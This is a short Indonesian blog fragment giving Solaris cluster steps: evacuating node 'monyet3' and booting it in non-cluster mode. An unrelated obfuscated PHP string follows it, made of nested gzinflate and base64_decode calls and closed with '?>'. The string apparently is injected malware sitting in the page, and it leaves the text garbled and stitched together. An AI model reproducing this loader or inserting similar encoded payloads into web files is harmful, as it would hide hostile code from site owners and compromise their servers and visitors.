
dari node yang aktif:

# clnode evacuate monyet3

shutdown monyet3 dan booting non cluster mode

ok boot -x

bersambung….



".gzinflate(base64_decode(gzinflate(base64_decode(gzinflate(base64_decode('BcHRdkMwAADQD/KgS0mzR8ShjSMJNWveEEamOGljab9+9+KOSbyef5IA89DREZ+phxlyKhQ2sF/pt2hxFtPHwFYI4J1+mVr7YRsVICLl0fQMYyzzvW8FIOGbX1PVUVAP0/uWuZs8RWoEcMl8XpKEe37FrPxw/eeNGNw19npJt8S5uOlh83I2wUDpI6btM7hPv0s8Idtwt7XVp6gqMz92VSRz6Zx7WFuuSb8YAk8IveQfQ69xi7kGBRCNSsZSDPl+CP4B'))))))); ?>